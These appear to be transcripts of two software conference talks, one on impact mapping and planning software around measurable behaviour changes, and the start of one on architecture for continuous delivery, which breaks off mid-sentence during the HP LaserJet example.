And the third dimension that he said people don't often think about is a time-based dimension, where as you start working, the opportunities change. And this fantastically reflects today's software ecosystem. If you read Lean Startup, that's what they talk about. So Peter Palchinsky came up with these three principles that you can read about in a book called Adapt by Tim Harford, which has the subtitle Why Success Always Starts with Failure, which is quite an interesting book. And he defined these three principles basically to help plan better. The first principle was try out lots of new things. Figure out kind of what you can try and try out lots of new things. And then the second principle is try to do these experiments on a scale where you can afford to fail. Don't run out of money. Don't get into a situation where you can't pay rent next month. And the last principle is figure out what worked when you try things out and keep the things that worked. Things that didn't work kind of discard and move on. And this is how you can adapt to lots of these dimensions that people don't currently plan for upfront. It's impossible to plan for these things. You need to kind of bake this in to the process to be able to kind of survive in an environment like that and be successful. And if we look at these things, this is kind of Lean Startup invented 100 years ago, plus one more important thing that kind of businesses are obsessed with these days that's called design thinking. Design thinking is this kind of business management and project management thing that was first used in the design community to design new products and then taken over by the business. Stanford Business School has a school for design thinking now. It's becoming really popular. And design thinking talks a lot about analysis. And they talk about analysis in an eye-opening way for me. Because most of the time when we did analysis, we take a user story and we analyze a user story. And what they say is that's not analysis, because you have only one option. You don't decide anything useful. You analyze that one option, you do that one option. What analysis should be about is choosing between options, what Peter Palchinsky talks about. So kind of design thinking has these two thinking phases they talk about, where you have to be in a divergent thinking phase where you create lots of options. And then you do analysis here in the middle to choose options. That's how you become successful. So kind of, and this is the interesting thing where kind of Palchinsky says, you know, we need to get this feedback out and things like that. And this is why if you look at something like this, this isn't a roadmap. It doesn't have options. It's not a useful high-level plan. If you think about roadmap, the words here, it's not a roadmap. It's potentially a road. It's one way of doing things. And in fact, it's not a road. It's a tunnel. You go in on one end, then you kind of do your sprints in the middle. You go out on the other end and then you figure out where you are, or maybe not even then. So that's a tunnel. It's not a roadmap. This is a roadmap. It's very simple what a roadmap means. It's a map of roads. It has lots of options. If I'm here and I need to get there, I know that this is my preferred way of doing things. But if that road is blocked, there's plenty of different options. And I can take this road. I can take that road.
I can look at this thing and, you know, if I wake up in the morning and for some insane reason this road isn't congested, I've never been in Oslo where that road wasn't congested. But if for some insane reason that road wasn't congested, I can step on the pedal and go really fast. I can use my engine. So kind of what I've realized is we need to be much better in software creating roadmaps like this because then they would allow us to apply Paltransky principles. They would allow us to kind of consider all these dimensions that people don't think about. And going back to kind of this, I realized what we really need to do is we need to do something like a GPS. So about seven or eight years ago before I bought my first GPS, the way we used to plan trips is we would pull out a large map, we'd figure out exactly where we want to go, and then we would get into a car and I would argue with my wife all the trip where kind of one of us would be reading this map and saying, oh, I don't know where the, so I think we missed it. Did we miss it or did we not miss it? And kind of we'd have to argue and stuff like that. Now, I have a machine that tells my wife she doesn't know how to drive. She's really good. I do not have to have a divorce. You know, there's somebody else arguing with my wife. But more importantly, when we miss a turn, it's immediately clear that we missed it. Plus, we do not need to stop. We do not need to pull this. What will typically happen is after half an hour we'd say, yeah, this doesn't look like we're going the right direction. Then we'd get out, we'd stop, we'd come down a bit, have a coffee, and then say, okay, let's ask somebody where we are, and then start replanting again, and then do the same thing. So with the GPS, we don't have to do the GPS. First of all, it recognizes when we're off our route. And the second thing is automatically comes up with another option. Now, with a really fast engine that we have, without a GPS, that's not that useful. With a GPS, that becomes incredibly useful. So the question is, how do we create a GPS for our projects? How do we create a GPS for our products? How do we create something that allows us to re-plan very quickly, that tells us when we're not on the route, that argues with the project manager on its own. So we don't have to fight with them. And there's a couple of really interesting things that the GPS has. GPS has a map with lots of options. So first of all, we need to start creating plans that have lots of options. The second thing the GPS does is the GPS shows in more detail something that we're close to. Shows us more options about something that we're close to. Doesn't too much care about the options that are farther away. The third thing the GPS does is kilometers per hour. That's fine. We have velocity, good, useful measure to figure out how we're stuck. Is there a troll on my car? But GPS also has two pieces of information we do not have now. And that's what does the next turn look like exactly so I can spot if I've missed it. How far away is my next turn? So I can kind of decide if I've gone too far. And it has the distance to its destination and the time when we're expected to arrive. Now, what I want to challenge you to think about, and I don't really have a good solution. I can tell you what I've done. I don't think it applies to everybody. But I hope to challenge you at least a bit to think how would you define those two pieces of information for you? Because they're very important. 
If we can do that, we can create a GPS. We have to redefine how we plan. Because if you look at this part of Palchinsky's principles, that's kind of where it all succeeds or fails. Seeking out feedback. How do we know that we have made the next turn? How do we know that we've not made it? And again, I hope I've convinced you that velocity is not the way to do that. That passing tests, a low number of bugs and things, that they're not a good way to do that. They're just negative metrics. The question is, what do we decide on? And if you look at a typical user story, a typical user story has this part here that is kind of the businessy thing there. But the problem with that is there's no victory condition on it. Because before this user story even went into the plan, this person was able to monitor the inventory. He could go to the warehouse. He could see boxes. He could ask people. He could phone them. He could look at the legacy system. He could look at the paperwork. This person was able to monitor the inventory. After the user story is delivered, this person is also able to monitor the inventory. There is no victory condition there. And that's why we measure success with story points. That's why we measure success with tests. That's why we measure success with bugs. Because there is no victory condition there. And one really, really interesting parallel to this, I told you we can learn lots from other industries, is I looked at this really interesting book by Robert Brinkerhoff, who talks about his light bulb moments on wasting millions of dollars hiring people to do training. Robert Brinkerhoff was in charge of a large training department in a huge American kind of company. He had millions of dollars of budget a year to spend on training. He would spend that, of course. And he realized after a couple of years, well, you know, every year we spend a few million on this, we're not really making that much more money. We're not making 10 times more money. If all this succeeded, if we trained our people to be this much better, why are we not 50 times more successful? And he realized this same thing. He realized there's no victory condition attached to it. People measure training by kind of ticking the boxes like, were you happy with this training? Was it a good use of your time? Yes, of course. It took two days of work. Was the trainer knowledgeable? Well, how do I decide? I have no idea what he's talking about. Probably, yes, he had the mustache and everything. So what Brinkerhoff figured out is all that is irrelevant: even if people hated the training, even if the trainer didn't have a mustache, even if people said it was a waste of their time, if, when they come back, the company makes more money, that's a good training. And we should do more of that. So he started thinking about, well, what we really need to do is think about not behaviors, not the way people do stuff. We need to think about changes in those behaviors. That's the light bulb moment for Brinkerhoff. That was kind of when my brain exploded, when I realized what he said. It took me kind of two readings of his book to figure that out. But what he was basically saying is this user story is bad, and you should return it. And you should ask a question: how differently is this person going to monitor the inventory after the user story is done? Faster. Okay, now we have a victory condition. How much faster is faster? Twice as fast, three times as fast, ten times as fast.
What this opens up is an opportunity to actually decide: have we succeeded or failed? Have we made our next turn? This is the next turn. This is what the next turn looks like. This is how far it is. If it's 10% faster, have we made this guy do this 10% faster? Or have we missed it? This allows us to compare user stories. If you have 20 user stories about this thing, and the first two get us there 10% faster, we do not have to do the other 19, the other 18. We have reached the destination. If we do this user story and the guy is actually doing it slower, we are going in a completely wrong direction. We should drop the code, drop the tests, and go back to what we used to do. So that's kind of a critical light bulb moment for me. But what Brinkerhoff also said is that's not even enough, because not all behavior changes are good. Not all behavior changes are leading you in the right direction. Not all turns are good. One brilliant example of that is the Hoover Free Flights promotion. The Hoover Free Flights promotion is remembered in the history of marketing as the worst marketing campaign ever. Vacuum cleaner manufacturer Hoover in 1991 had lots of old equipment in their warehouses in the UK. And what they decided to do is try and sell it off to make space for new equipment. They went to the marketing department and said, here's a problem for you. We want to clear out the existing equipment. We don't care if we make a slight loss. As long as we clear out the warehouses. And the marketing department said, okay, well, if you don't care about making a slight loss, let's give people something for free. Everybody likes freebies. So for example, you buy a vacuum cleaner, you buy 100 pounds worth of vacuum cleaners, you get a free airplane ticket anywhere in Europe. We're going to make a slight loss, but we're going to sell off everything really quickly. And they said, okay, you know, let's do that. They started doing it and they have changed people's behavior. People started buying a lot more vacuum cleaners. They have succeeded in that they've made the next turn. Actually, they've done it much, much better than they expected to do. And then somebody somewhere else in the company looked at an Excel spreadsheet and said, wow, more, more, more. So they started selling new equipment like that. And they started, kind of because the travel agents couldn't keep up with that, they started doing more, more, more, more, more. And then they realized, well, you know, the people we work with in Europe can't keep up with this, we need to expand this. And some genius somewhere came up with the idea to expand this offer to intercontinental flights. So it doesn't take a math genius to understand that people were soon buying 100 pounds worth of vacuum cleaners to throw them away and get the 700 pound ticket to the US. And a slight financial loss was no longer slight. They started bleeding money. So they had this next turn and they've made the next turn. And then they realized, okay, let's make it again. Let's make it again. Let's make it again. And they've not measured whether it's actually leading them in the right direction, whether they've achieved what they wanted to achieve. So the net result of this is the UK company went bankrupt. They took a 50 million pound loss. The European arm was sold to Italians and Hoover pulled out of Europe. It took them seven years of dragging through courts to resolve all the customer complaints. As a marketing campaign, that's as bad as you can get.
But during the time when they were doing it, it was a massive success. They shipped and shipped and shipped. The fact that the ship was turning over, nobody cared. So kind of Brinkerhoff says that in addition to monitoring this, we need to figure out what the big picture change is and how we measure the big picture change. In essence, why do we want to do this? Why is this a good idea? And how do we measure, in the bigger picture, that this was a good idea? So that's what we started doing with user stories. I started giving people cards like this. When they give me user stories, I said, don't worry about user stories yet. Kind of try and tell me what somebody can do faster or better or slower or worse. So what is the change in somebody's work and what does that help you really achieve? What is the big picture there? And we kind of put ideas on things like this and then we kind of group them together. And this gave us the GPS thing. Because at the end of the day, if we get to the destination, if we want to sell more vacuum cleaners, and we decide how much more is more, and we do sell that many more vacuum cleaners, it doesn't matter how we got there. So this starts creating lots of options. It starts creating the GPS thingy. And then I found this mental model from three psychologists called Gibb, Weisbord and Drexler. These guys were working with non-government organizations in the United States in the 60s. And they were fighting one particular problem. They were fighting a problem of people having lots of money. Non-government organizations have lots of money. They had lots of people involved. Lots of staff, lots of volunteers. And they weren't really achieving anything big, because they realized they were all pulling in different directions. And the reason why they were all pulling in different directions is that people hated planning. As a volunteer, you want to do stuff. You don't want to spend six months planning. And we have a very, very similar problem today. Software has lots of money. It's in all the industries there. Software has lots of people involved. And it's not that people hate planning, well, I personally hate planning, and there are lots of people who love planning, but we do not have time to do that. Stuff changes too quickly. So it's a similar position, where they said people hate doing this because it takes six months. We need to give them a way to plan this in one afternoon and align well on what they want to do so they're driving in the same direction. And what these guys realized, something that's fantastically useful for software today, is that in one afternoon or one day, by asking four questions, you can align senior stakeholders and create a very, very good set of options for your GPS. You can do kind of those cards through this. So what they were talking about is four questions that said, well, why are we doing this in the first place? Who needs this? Who are the people we want to influence? Who are the people we want to allow to change, who wants this? Then, what do these people want? What do these people need? And at the end, well, how can we help them do that? So this is kind of, from a business perspective, some business behavior. This is some software deliverable in our case. And they said, well, you start wherever you know. People typically know this. I want an iPhone app. Yes, of course. And kind of you work your way up and down until you align everybody's expectation. You do that on a whiteboard to align people's opinions. This is an incredibly effective technique.
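As an illustration only, with invented content rather than anything from the talk, the four questions hang together as a small tree; you start wherever you know and work up and down:

```
Why are we doing this?      Increase repeat purchases in the web shop
  Who needs this?           Returning customers
    What do they want?      A faster way to reorder the things they buy often
      How can we help?      One-click reorder from order history
      How can we help?      Saved shopping lists
```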
There's a Swedish interaction design agency that independently, I think, came up with the same set of questions to visualize project scope. They called that thing an effect map because they visualize big effects. And what they've done is they created a mind map starting from here and growing into lots of options. And we look at it, it looks like a roadmap. There's a destination. There's lots of roads. And all of these roads kind of lead to the same thing. So you can choose which one you want. And they were asking the same kind of questions. What I realized is for my projects at least that are not government projects. I work with banks. I work with insurance companies. Kind of it's slightly better to ask a bit of a different question. So the first two stay the same. But the third question isn't what do these people want? Because all my customers always want to become rich and move to the Caribbean. That's not part of my project. The more important question is how do we want their behavior to change? We're going back to Brinkerhoff's behavior change model. So how do we want their behavior to change? And then the last one kind of it would be stupid to ask how, how. So we started asking, well, what can we do to support this change? So we started creating mind maps like that. It's incredibly powerful. Here's an example. I worked with a gaming company where the owner of the company came in one day and said, the next thing we'd like you to do is levels and achievements for all our games. And here's what the marketing department came up with. Here are some wireframes. Here are some diagrams. It was roughly about seven to nine months of work. And we said, this is a really nice tunnel. We'll go into this tunnel now. Seven months later, we'll maybe come out. Let's perhaps use this engine we have that can deliver every two weeks to at least breathe some air and figure out how we go in the right direction. And we said, let's just go through this thinking process and ask these questions. And we said, well, going back to kind of the Gibb, Weisbord and Drexler model, this is the answer to the last question. This is kind of the software deliverable thing. Now, how does this change somebody's behavior? And he said, I don't understand what you mean. We said, imagine that we spend nine months working on this, the whole team. And the users are still using our website the way they used to use it today. Nothing changes. Was this a waste of time and money? He said, of course. So what would you expect to change in their behavior if they have levels and achievements? He said, well, I'd expect them to post to Facebook more because you come up, you know, you get your level five wizard thing and you post to Facebook. So all of a sudden, we know what the behavior change is and we know who we are talking about. Lots of user stories talk about, as a trader, I want to trade because I want to trade, or as a system, I want this report. This thinking process gives you who and why. And what's really interesting is scope creep doesn't fit visually in. As a system, I want this report doesn't fit visually in. And we kind of said, okay, the next question is, why is this important? And he said, well, it's important because I want it. And I'm paying for this. And we said, well, that's okay. But you know, kind of help us understand on a higher level. What are you getting from that? Maybe why is too big of a question now? Let's ask the other question. How does this change somebody else's behavior? So they said, you know, jump up and down.
How does this change somebody else's behavior? And he said, well, if players post more to Facebook, other people will read more about this and come to play the games. I said, okay, why is that important? And he said, well, that's a stupid question. More players, more money. We know that the player is worth about $100 over his lifetime. More players, more money. So I said, okay, what you actually want to get is more players. Now, how much more is more? When do we stop? What is our destination? And he said, well, more. I said, well, if we spend seven months doing this and get five more players, is that enough? He said, don't be stupid. Well, at which point is this failed? And he said, well, if you don't get at least one million more players, we have failed. So we said, okay, one million at least. So now we have this kind of set of questions. And we said, let's not go into a tunnel. Let's not spend seven months doing this. Let's prove that this road exists. Let's prove there are no trolls on this route. And he said, well, what do you mean? Well, maybe we can do something very quick about this and prove that this road actually exists. Let's do, you know, let's seek out variability. Let's seek what worked. And one of the guys said, well, look, we have tournaments. One of your achievements is tournament winner. There's a lot of complexity around that. Let's do something simple. Let's, if you win a tournament, we pop up a dialogue and we say, you won a tournament, would you like to post to Facebook? So we added an option there. Kind of, it's visual, it fits in. There's a new user story, very small user story that kind of contributes to a business goal. Or we think it does. And we said, let's do that. This is five hours of work. We did that. And we have proved that people do not like to spam their friends. So we said, okay, you know, maybe spending seven months on this road isn't such a good idea. And that's where we really started doing kind of the design thinking thing where let's create options. If what you want to do is one million players, maybe there's some other ways of getting there. And this is why kind of this mind map structure is good because it asks, makes people ask the right questions. Like we said, well, we know players can post more. Is there anything else players can do? Is there some other way we can change the behavior? Is there somebody else we can influence? Is there something else we can do about this? You know, maybe let's come up with options. Let's create a map. And we, somebody said, okay, um, players could actually invite their friends more than they do now. And we can automate this. I can come up with some nice wireframes. I can, you know, I will give them chips. We do this. Let's not do the same thing again. We have this nice fast engine. We do not have to do waterfall. You don't have to go away for two weeks and give me the diagrams. Let's prove that this road works. So let's not automate everything yet. So maybe we can do something that's semi-automated. Maybe we can put a page there that has a button that says invite your friends. And that doesn't really do anything. We'll pay people manually. We'll give them chips manually. We will invite their friends manually. And we'll prove that this road exists or doesn't exist. And we did that. And then we spent two nights on it. We sent a couple of hundred emails and nobody came. So we proved that people, yes, if you promise them free chips, they will invite their friends. So this road here exists.
This road there, we have not discovered yet. And we went back to the marketing department and said, sorry, bad idea. And they said, no, no, this is the best idea in the world. It must work. You have done something wrong. There's a bug. I said, no, no, no, look, there's no bug. There's no software. I've sent the email myself. I can show you the email log. So there is no bug. Now, what I realized at this point is something very, very interesting: this is a way to visualize assumptions. All the roads on this map are assumptions, which is a very liberating thing, because we said you do not have to be right. Give me an assumption why you think this failed. And we'll test it. We have a really fast engine. We do 70 story points. Our velocity is fantastic. We test it. Give me an assumption, you don't have to be right. You don't have to plan for a long time. And he said, well, my assumption is that the text in the email was wrong, because the link is not really differentiable from the rest of the text. It says join the game, but it's not really obvious. It's a link. It's in a paragraph of text. Maybe people didn't see that. We said, okay, let's test that. So we said, let's do a variation. We put a big, big button that says join a game. We sent a couple of hundred emails, and we proved that this road now works because people were inviting their friends and friends were coming. And then what we did is we proved this is a really wide road. Now there's no congestion. We drove a truck through that. By the time we ticked off the first couple of options there, we had one million players. We spent about three weeks doing that. We did not have to spend seven months doing levels and achievements, because we have achieved what we wanted. Now the question is what next? So that's kind of the thinking process behind this. And I am not saying it applies to everybody. There's lots of challenges with this. What I wanted to do with this thing today is challenge your thinking. What would be the right questions to ask in your environment? The nice thing about this technique is it's visual and it's fast. You get people to draw on a whiteboard. They start agreeing. They start aligning. That's what Gibb, Weisbord and Drexler did. So the key advantage of this over the other stuff I've done that's similar is it's collaborative. It's visual. It's fast. It's for people who hate planning. It's for people who don't have time to plan. And it visualizes assumptions. There are very few software requirements models that visualize assumptions. So it creates lots of options. And remember that with the roadmap, unless you are the Google Street View car or the NSA, your goal is never, ever, ever to drive through all the roads. When you look at the roadmap, you would never say, okay, there's 500 streets that get me there. I'll drive through all of them and then I'll get out and get a coffee. What you try to do is get the shortest path possible or the fastest path possible. You know, sometimes the most enjoyable one, but kind of find a path through that. Find options that lead you to the goal. So think about that. So here's some.
|
Software is everywhere today, and countless software products and projects die a slow death without ever making any impact. Today's planning and roadmap techniques expect the world to stand still while we deliver, and set products and projects up for failure from the very start. Even when they have good strategic plans, many organisations fail to communicate them and align everyone involved in delivery. The result is a tremendous amount of time and money wasted due to wrong assumptions, lack of focus, poor communication of objectives, lack of understanding and misalignment with overall goals. There has to be a better way to deliver! Gojko presents a possible solution, impact mapping, an innovative strategic planning method that can help you make an impact with software.
|
10.5446/51434 (DOI)
|
Okay, so my name is Jez Humble. I work for ThoughtWorks. We do consulting and delivery for software and we have tools to help you with that. Mingle for agile project management, Go for agile release management and Twist for agile testing. I co-authored this book called Continuous Delivery and I'm here today to talk about architecting and re-architecting and continuous delivery and the relationship between these things. So it's not going to be a detailed kind of lots of code on the whiteboard talk. So if you want something very detailed and codey, now would be a good time to go and see one of the other things that is more detailed and codey. I'm not at all offended if people decide to walk out and go and see something else instead. If that would be the best use of your time, please go ahead and do that. Don't feel bad at all. Also there's voting at the end. So at the end, please choose a green card, a yellow card or a red card depending on how you feel about the talk. Remember that in China red is lucky but in Norway not so much. I've been having a great time in Norway. It's my first time here. I went to Bergen on Monday and I got sunburned, which was unexpected but very nice. So architecture. Architecture is a term obviously that comes from building buildings and if you're actually building, if you're doing construction, doing civil engineering projects, one of the important things as an architect you have to care about is what's the nature of the materials you're using. Iron, steel, wood, plastic, all these things have different characteristics and that affects the way you think about what you're building. And so obviously if you're building, if you're architecting things that have to stand up for a long time like a bridge, you have to think carefully about the materials that you're using. Now project management and architecture are focused around building things like this or buildings which have a certain set of characteristics. So once you build a bridge or a building, normally it doesn't fall down. If it does, that's bad; that means you've done a bad job. Once you build it, it doesn't change a lot. So we don't build a bridge and go, well that isn't really right and that isn't what we wanted. We're going to totally change the way that works now because our users didn't like that. Running a bridge requires different skills from building the bridge, completely different set of practices. Once we have built the, once we've designed the architecture for the bridge and thought about how we want it to behave, actually then building it will not give us lots of new information that makes us think again about the architecture. That's not supposed to happen when you're building bridges and buildings. And then most importantly when you're building a bridge, you have to finish it before you can start using it and before you can determine the return on investment that you will get from having built it, the value that it's delivered. So you'll notice that all of these statements that I've made about bridges do not apply to software. And what that means is that architecture and project management techniques that we use for building bridges are actually really bad for building software. We should not be using them because they drive the wrong kinds of behaviors. Do we want our software, once we've released it to users, do we want to make sure that it doesn't change that much? No. We want to get feedback from users and build something that's valuable to them.
Most of the time when you build software for someone, it's not what they want. 19 out of 20 startups fail because they've built something that wasn't valuable to customers. So, you know, if 19 out of 20 bridges that we built turn out not to be useful, that would be really bad. Right? So software is fundamentally different from civil engineering. And that affects the way we should think about architecture. In software, we can start delivering value to our customers from early on in the project before the thing is finished in terms of having all the features that we would ultimately like. People might derive, hopefully people can derive value from early on before we finish building all the features. We can give some people a subset of the features and they will find those useful. It's cheap to prototype and experiment with software. We can spike things out. We can prototype things very, very cheaply. That's not true with bridges. Once you've delivered some software, compared to a bridge, it's relatively simple to make changes, even large scale changes with software. And then finally, with a bridge, to build a bridge, you don't need highly paid architects. You need a bunch of construction workers. That's not true for software. And unfortunately, this idea that the highly paid architects will design the software and we can hire a bunch of cheap people who aren't very smart to actually build the software is one of the biggest problems in the software industry today. Because when you actually build the software, you make loads and loads of discoveries about how the thing will actually work because software is a complex system. Software systems are complex and they have dynamic complexity. That's not true of bridges. You can model bridges and model the forces on them analytically. You cannot model the way users will interact with your software using analytic models. They are complex systems. And when you build complex systems, you discover a lot of information in the course of building them that affects your decisions or that gives you feedback about your decisions on your design. Building software is harder than thinking about the design. So, what would a system built to leverage these characteristics, which are characteristics of software, if we built a system that leveraged these, if we actually used our materials and played to the strengths of these materials that we're using, software, what might that system look like if we actually played to the strengths of software rather than applied civil engineering techniques? Well, you might find something like this. Amazon.com, this was at Velocity last year, you can see that Amazon.com, they were making changes to production every 11.6 seconds. They were doing 1,079 deployments to production per hour. 10,000 boxes in production at the receiving end of a deployment on average, and up to 30,000 in total. So, people sometimes ask me, you know, Jez, can continuous delivery scale? And I say, have you heard of a website called Amazon? It's quite big. They are doing this and they have to worry about Sarbanes-Oxley and PCI DSS and all the regulations and things that make this stuff difficult. So, why did they do this? I mean, this is hard. Continuous delivery is hard. Doing all this stuff is hard. Why do they care about it? Primarily so they can run lots and lots of experiments to try and find out how to deliver value to users.
When you design, when you come up with an idea for a software product or a feature, what you have is a hypothesis. And what you want to do is try and test that hypothesis. And the most expensive way to test the hypothesis is actually to build the software. That's the most expensive and inefficient thing that you can possibly do. You know, and if you're building bridges, you kind of have to do that, right, or buildings, but which is why in 2008, the construction industry took a total nose dive because suddenly we had all these things that were unfinished that we couldn't make money from. So, the reason they do this is so they can run experiments. So, they can come up with ideas for features and run an experiment and A-B test in production to find out if it will actually change people's habits. If people, they will make more money from people if we have the buy button here rather than here, if we present books that other customers like here on the page rather than here. How can we improve the experience of customers so they spend more money? And we do that by running loads and loads of experiments doing A-B testing. That's why they do this. It's so they can make things better for their customers by testing hypotheses really, really fast and getting feedback and establishing a close connection with their customers so they can deliver value. So, that's the main value of continuous delivery. And by the way, as a side effect of continuous delivery, you also reduce the risk of release and make deployments much easier and less risky, which is nice. Otherwise, you couldn't do this, right? So, the point of continuous delivery is to reduce the cost, the time and the risk of delivering incremental changes to users. It's so we can make incremental changes to our software all the time really, really cheaply and at low risk. That's what it is. How do you know when you're doing it? The idea is that your software should always be releasable on demand. From the very first feature you build, you should be able to press a button and release it. Releasing should be boring. If we're doing continuous delivery right, releases are boring. You're not going in at the weekend. You're not staying late at night. It's a boring thing you can do during peak hours by pressing a button. No big deal. We prioritize keeping the system releasable over new functionality. If at any point we discover the performance is dropped below a certain threshold or the acceptance tests are failing or there's a security problem or the unit tests are broken, we stop and fix that problem before we do new work. So, we're not, oh, you know, we must cut. The acceptance tests aren't working but those failures aren't important. We'll just carry on delivering features. No, you shouldn't be doing that. In order to make that possible, people need to get fast feedback. If I write some code or make a configuration change and it takes me a week to find out whether that's going to degrade performance, that makes it very hard for me to actually be fast at delivering code because I'm getting feedback from what I was doing a week ago on whether that thing actually affected performance. I don't know about you guys. I can barely remember what I was doing yesterday, let alone a week ago. So, I get a bug report from a week ago. I have to try and triage it, work out what was going on. It's an absolute pain. By the way, people sitting here, there are seats up here. So, please feel free to grab seats and bother these people. 
And if people at the end could move down so that these people can move in, that would be super. Thank you. Cool. Thanks very much, everyone. And this fundamentally changes the way we do product delivery. Instead of having these projects where it's very waterfall-y, what we should be doing is you start with an inception. We've got a new idea for a product. And we're going to get together as a team and work out what's the vision we're trying to achieve? What's the measurable customer outcome we want to achieve? And then design an experiment to test if we can achieve that measurable customer outcome using the proposed software program. So, we design experiments and then we run the experiment. It's called a minimum viable product, but it's an experiment. And most of the time, that will produce some results that tell us that users don't want what we built. If we're innovating, innovation is high risk. We want potentially high returns. When you want a high return, you are going to take risks. I mean, this is investment 101, right? And so naturally, if you're taking risks, most of the time, what you want, what you build is not actually going to be valuable. So, most of the time, we'll fail with this. And what we produce is not something that people want. And we either pivot, change our business plan, or we can keep delivering increments and trying to move closer towards what customers want. But the first thing we build will not be what our customers want if we're innovating. So, we need to find ways to find that out cheaply and then to iterate or pivot based on that. So, what are the implications of this for architecture? So, fundamentally, what architecture is about is cross functional requirements, performance, availability, scalability, all the other ilities. That's what architecture is for. Architecture is what makes sure that our software will meet its cross functional requirements as opposed to the design of the features which is about meeting the functional requirements. So, architecture is what allows you to do this stuff. What is important for continuous delivery? First of all, we want to make sure that any increment that we build is testable at all levels. So, I should be able to run acceptance tests on my workstation. I should be able to get, find 80% of the bugs in my software by running it on my workstation. If I have to get an integrated environment and stand up 20 different services and try and get them to all work together before I can run my acceptance tests, I have a problem because it's expensive to do that and it's painful to do that. And so, I'm going to get that feedback very, very infrequently because it's such a pain to actually do that. So, that's an architectural thing. If I can't run the software in a non-integrated environment on my workstation and get the feedback, that means I have an architectural problem. We need to take account of that in the architecture, actually making sure that I can run tests on my workstation. If I need continuous delivery, I need to be able to do incremental development on trunk. That means continuous integration, which means everybody is checking into trunk at least once a day. We are not working on long-lived feature branches. If you're using feature branches and you're not integrating them into trunk once a day, then you can't do continuous delivery because you can't get feedback on whether your code actually works. You know, "it works on my workstation" is meaningless.
If it works in production, integrated with the rest of the code, with realistic data sets and realistic loads, then maybe I'll consider thinking about saying it's done. People use feature branches because they want to optimize for working, for getting done with their feature, but that's kind of pointless. So our architecture needs to enable us to be able to do that, to be able to work incrementally on trunk, which means we need to follow things like the SOLID principles, make sure that our software is well encapsulated and that it's componentized so that if I make a change, it doesn't splatter all over the code base. Deployability is an architectural concern. How easy is it to deploy the software? So people talk about deployment automation. We should take the deployment process and automate it. If the deployment process is really complex and flaky and I automate it, what happens is I turn a complex error-prone manual process into a complex error-prone automated process, which is of no value. We need to simplify first, make sure that it's simple to deploy and then automate that. And if the architect, and that's an architectural concern, if it's really hard to deploy the app because I need to stand up a bunch of different things and then apply a bunch of different configuration settings from a bunch of different repositories and it's really difficult to actually stand up or to deploy some new part of that, then I can't do that. We need to focus on making deployment simple so that we can automate it effectively. Also, if we're going to deploy, you know, frequently, then we need to make sure that maybe we have availability constraints, maybe we have an SLA that says our service can't be down. So if I need to take the service down in order to deploy, maybe that's a problem. Maybe I won't meet my SLAs. So you're thinking about things like, well, if I keep a bunch of state in the cache and I need to flush the cache every time I do a deployment and I can't do that, that's a problem. This is one of the reasons that Ruby on Rails has at least some nice characteristics. All the user state is in the database, so I don't need to worry about session caches and maintaining session caches across deployments. These are things that you need to think about if you're thinking about continuous delivery: keeping state in session caches, availability and security and all these things during deployment. So architecture for continuous delivery, there's two things. There's firstly, making sure that we can test our cross functional characteristics all the time against any change. And this is an important characteristic of complex systems: I make a change, and I cannot predict the consequences of that change. This is the problem with code inspection, with code reviews. Code reviews will help you find some problems, but we are building complex systems. And so I make a change and I can perhaps in my head predict some of the consequences of that, but it's going to be really hard for me to predict things like what's the impact on performance. Nobody sets out to degrade performance. People degrade performance by mistake because they're building complex systems and we make changes that degrade performance and we didn't realize that was going to happen. And the person reviewing our code didn't realize that was going to happen either. So we need to be able to find those things and validate them by testing. The other part of architecture is designing for resilience.
When you build complex systems, failure is a normal part of the operation of complex systems. It's not something exceptional, failure is a normal part of the operation of systems. This is what people doing disaster analysis for Three Mile Island and other problems discovered. When you build complex systems, you can't prevent failure, but you need to design your system to be resilient to failure. So that's the other part, the second part of architecture. So we're going to talk about testing first. If you have questions at any point, stick your hands up. I'll try and leave time for questions at the end as well, but if you ask, if you want clarifications, stick your hand up during. If you have a long question, keep it to the end, but feel free to argue with me if you think I'm talking crap. I appreciate that. So I'm going to talk about testing. There's this quadrant diagram created by Brian Marick where he divides testing up along two axes, whether the tests support programming or whether they critique the project, whether the tests are technology facing or whether they're business facing. And so down on the bottom left here, unit tests, component tests, these are tests that test one small part of the system in isolation, a single method, a single function, and then groups larger than that. And these should all be automated. And you should be using, who here uses TDD, who writes tests before they write the code that makes the test pass? That is fabulous. That's about a third to nearly a half of you. That's the best result I've ever had. So good job. TDD is, in my experience, the only way to create maintainable suites of unit tests. But that stuff should always be automated. Up on the top right here is the stuff that you use your expensive valuable human beings for. Showcases, usability testing, exploratory testing. These are things that only human beings can do. On the top left here are the functional acceptance tests, end-to-end tests that run in a production-like environment that demonstrate that the software delivers the expected business value to users. And then here are the ilities. These are the things where you're validating your architecture. Will the system scale? Will it meet its SLAs in terms of availability? Are there security problems? Is it deployable? Is it testable? So these are the things that are validating your architecture. And some of those things are automatable. So performance testing, if you've done your acceptance tests right, you can reuse them as a basis for load testing. Some kinds of security tests are automatable, like penetration testing. You can do some of that in an automated way. You can use static analysis to look for buffer overruns, SQL injection attacks, and all these kinds of things. But some of it can't be automated. So some parts of security testing are very hard to automate. What do we do once we have all these tests? What we do is we create a deployment pipeline. And I want to give you an example of a deployment pipeline in the context of an interesting domain which is firmware. So who here is working in embedded software? Any embedded software people? Okay, one person. Who's building websites or web services? Whoa, okay, almost everyone. Anyone building user-installed products? Okay, a smattering of you, maybe a quarter of you building user-installed products. So what I'm going to talk about applies to user-installed products as well. But it also is very important for building web services. A lot of the same lessons apply.
So the HP LaserJet team, I mean, these are the people who built the firmware for LaserJets. And in 2008, they had a problem. And their problem was they were too slow. And the business came to them and said, you're too slow, we need you to fix it. And they went and looked at what they were doing. And they found that most of their time was not spent writing new functionality. They had, for example, a different branch for every group of printers and scanners and multifunction devices they were creating. So every time they came out with a new product line, they created a new branch in version control. And so they were spending 25% of their time porting code between branches. If I add a new feature or make a bug fix to this line of printers and I want the same thing in another line of printers, I need to merge it between branches. And they were spending 25% of their time on current product support, 15% of their time on manual testing, detailed planning, code integration. You subtract that from 100, you're left with 5%. Which they claim was time spent innovating rather than lying down with aspirin in their body because they were totally exhausted. So they had to do something. And what they did was pretty radical. They re-architected the system from scratch. And their main, the main criterion for the re-architecture was the ability to check in everything to trunk. Not to have branches, everything was going to be on mainline. And the way they did that was they created feature toggles, basically. So there was one build that was created that was deployed to all the different devices. And when you start the device, the firmware boots, it looks to see the device that it's on and it switches features on or off depending on the device. So the ability for the developers to check in on trunk was an architectural concern. And they made sure that architecture supported that so they could get rid of this 25% of their time they were spending porting code between branches. And what they were then able to do was to create a deployment pipeline. Where they had, so HP LaserJet team, 400 people 